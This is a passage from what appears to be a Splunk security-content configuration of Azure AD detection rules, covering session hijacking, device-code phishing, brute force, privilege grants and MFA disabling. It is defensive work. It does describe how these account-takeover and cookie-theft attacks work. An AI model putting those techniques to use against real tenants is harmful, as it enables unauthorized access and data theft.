mvfind('targetResources{}.modifiedProperties{}.displayName', "AllowUserConsentForRiskyApps"), -1) | search index_number >= 0 | eval AllowUserConsentForRiskyApps = mvindex('targetResources{}.modifiedProperties{}.newValue',index_number) | search AllowUserConsentForRiskyApps = "[true]" | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, operationName, AllowUserConsentForRiskyApps | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_block_user_consent_for_risky_apps_disabled_filter` [ESCU - Azure AD Concurrent Sessions From Different Ips - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique Ip address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique Ip address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = A user with concurrent sessions from different Ips may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Concurrent Sessions From Different Ips - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ has concurrent sessions from more than one unique IP address in the span of 5 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Concurrent Sessions From Different Ips - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique Ip address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.notable.param.rule_title = Azure AD Concurrent Sessions From Different Ips action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` properties.authenticationDetails{}.succeeded=true category=NonInteractiveUserSignInLogs | rename properties.* as * | bucket span=30m _time | stats count min(_time) as firstTime max(_time) as lastTime dc(src_ip) AS unique_ips values(src_ip) as src_ip values(appDisplayName) as appDisplayName by user | where unique_ips > 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_concurrent_sessions_from_different_ips_filter` [ESCU - Azure AD Device Code Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the execution of the Azure Device Code Phishing attack, which can lead to Azure Account Take-Over (ATO). The detection leverages Azure AD logs specifically focusing on authentication requests to identify the attack. This technique involves creating malicious infrastructure, bypassing Multi-Factor Authentication (MFA), and bypassing Conditional Access Policies (CAPs). The attack aims to compromise users by sending them phishing emails from attacker-controlled domains and trick the victims into performing OAuth 2.0 device authentication. A successful execution of this attack can result in adversaries gaining unauthorized access to Azure AD, Exchange mailboxes, and the target's Outlook Web Application (OWA). This attack technique was detailed by security researchers including Bobby Cooke, Stephan Borosh, and others. It's crucial for organizations to be aware of this threat, as it can lead to unauthorized access and potential data breaches. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery"], "mitre_attack": ["T1528", "T1566", "T1566.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the execution of the Azure Device Code Phishing attack, which can lead to Azure Account Take-Over (ATO). The detection leverages Azure AD logs specifically focusing on authentication requests to identify the attack. This technique involves creating malicious infrastructure, bypassing Multi-Factor Authentication (MFA), and bypassing Conditional Access Policies (CAPs). The attack aims to compromise users by sending them phishing emails from attacker-controlled domains and trick the victims into performing OAuth 2.0 device authentication. A successful execution of this attack can result in adversaries gaining unauthorized access to Azure AD, Exchange mailboxes, and the target's Outlook Web Application (OWA). This attack technique was detailed by security researchers including Bobby Cooke, Stephan Borosh, and others. It's crucial for organizations to be aware of this threat, as it can lead to unauthorized access and potential data breaches. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = In most organizations, device code authentication will be used to access common Microsoft service but it may be legitimate for others. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Device Code Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Device code requested for $user$ from $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Device Code Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery"], "mitre_attack": ["T1528", "T1566", "T1566.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the execution of the Azure Device Code Phishing attack, which can lead to Azure Account Take-Over (ATO). The detection leverages Azure AD logs specifically focusing on authentication requests to identify the attack. This technique involves creating malicious infrastructure, bypassing Multi-Factor Authentication (MFA), and bypassing Conditional Access Policies (CAPs). The attack aims to compromise users by sending them phishing emails from attacker-controlled domains and trick the victims into performing OAuth 2.0 device authentication. A successful execution of this attack can result in adversaries gaining unauthorized access to Azure AD, Exchange mailboxes, and the target's Outlook Web Application (OWA). This attack technique was detailed by security researchers including Bobby Cooke, Stephan Borosh, and others. It's crucial for organizations to be aware of this threat, as it can lead to unauthorized access and potential data breaches. action.notable.param.rule_title = Azure AD Device Code Authentication action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs "properties.authenticationProtocol"=deviceCode | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime by user src_ip, appDisplayName, userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_device_code_authentication_filter` [ESCU - Azure AD External Guest User Invited - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities` action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities` action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Administrator may legitimately invite external guest users. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD External Guest User Invited - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = External Guest User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD External Guest User Invited - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities` action.notable.param.rule_title = Azure AD External Guest User Invited action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Invite external user" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.type as type | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by type, initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_external_guest_user_invited_filter` [ESCU - Azure AD FullAccessAsApp Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the 'full_access_as_app' permission, marked by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is assigned to an application within Office 365 Exchange Online, identified by ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. This permission grants broad control over Office 365 operations, including full access to all mailboxes and the capability to send emails as any user. The query utilizes the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This monitoring is crucial for early detection of potential unauthorized access or data exfiltration, as the 'full_access_as_app' permission could lead to significant security incidents if exploited. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when the 'full_access_as_app' permission, marked by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is assigned to an application within Office 365 Exchange Online, identified by ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. This permission grants broad control over Office 365 operations, including full access to all mailboxes and the capability to send emails as any user. The query utilizes the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This monitoring is crucial for early detection of potential unauthorized access or data exfiltration, as the 'full_access_as_app' permission could lead to significant security incidents if exploited. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = The full_access_as_app API permission may be assigned to legitimate applications. Filter as needed. action.escu.creation_date = 2024-01-29 action.escu.modification_date = 2024-01-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD FullAccessAsApp Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = User $user$ assigned the full_access_as_app permission to the app registration $object$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD FullAccessAsApp Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when the 'full_access_as_app' permission, marked by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is assigned to an application within Office 365 Exchange Online, identified by ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. This permission grants broad control over Office 365 operations, including full access to all mailboxes and the capability to send emails as any user. The query utilizes the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This monitoring is crucial for early detection of potential unauthorized access or data exfiltration, as the 'full_access_as_app' permission could lead to significant security incidents if exploited. action.notable.param.rule_title = Azure AD FullAccessAsApp Permission Assigned action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="Update application" | eval newvalue = mvindex('properties.targetResources{}.modifiedProperties{}.newValue',0) | spath input=newvalue | search "{}.ResourceAppId"="00000002-0000-0ff1-ce00-000000000000" "{}.RequiredAppPermissions{}.EntitlementId"="dc890d15-9560-4a4c-9b7f-a736ec74ec40" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_fullaccessasapp_permission_assigned_filter` [ESCU - Azure AD Global Administrator Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Administrators may legitimately assign the Global Administrator role to a user. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Global Administrator Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = Global Administrator Role assigned for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Global Administrator Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment. action.notable.param.rule_title = Azure AD Global Administrator Role Assigned action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add member to role" properties.targetResources{}.modifiedProperties{}.newValue="\"Global Administrator\"" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_global_administrator_role_assigned_filter` [ESCU - Azure AD High Number Of Failed Authentications For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Azure AD account with more than 20 failed authentication events in the span of 10 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Azure AD account with more than 20 failed authentication events in the span of 10 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = A user with more than 20 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD High Number Of Failed Authentications For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to authenticate more than 20 times in the span of 5 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD High Number Of Failed Authentications For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Azure AD account with more than 20 failed authentication events in the span of 10 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. action.notable.param.rule_title = Azure AD High Number Of Failed Authentications For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime values(src_ip) as src_ip by user | where count > 20 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_high_number_of_failed_authentications_for_user_filter` [ESCU - Azure AD High Number Of Failed Authentications From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 10 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 10 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = An Ip address with more than 20 failed authentication attempts in the span of 10 minutes may also be triggered by a broken application. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD High Number Of Failed Authentications From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = $src_ip$ failed to authenticate more than 20 times in the span of 10 minutes minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD High Number Of Failed Authentications From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 10 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. action.notable.param.rule_title = Azure AD High Number Of Failed Authentications From Ip action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip | where count > 20 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_high_number_of_failed_authentications_from_ip_filter` [ESCU - Azure AD Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Legitimate use case may require for users to disable MFA. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = MFA disabled for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = Azure AD Multi-Factor Authentication Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="Disable Strong Authentication" | rename properties.* as * | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime by user, type, operationName, initiatedBy, result | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multi_factor_authentication_disabled_filter` [ESCU - Azure AD Multi-Source Failed Authentications Spike - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects potential distributed password spraying attacks within an Azure AD environment. It identifies a notable increase in failed authentication attempts across a variety of unique user-and-IP address combinations, originating from multiple source IP addresses and countries, and employing different user agents. Such patterns suggest an adversary's attempt to bypass security controls by using a range of IP addresses to test commonly used passwords against numerous user accounts. The detection scrutinizes SignInLogs from Azure AD logs, particularly focusing on events with error code 50126, which signals a failed authentication due to incorrect credentials. By collating data over a five-minute interval, the analytic computes the distinct counts of user-and-IP combinations, unique users, source IPs, and countries. It then applies a set of thresholds to these metrics to pinpoint unusual activities that could indicate a coordinated attack effort. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are 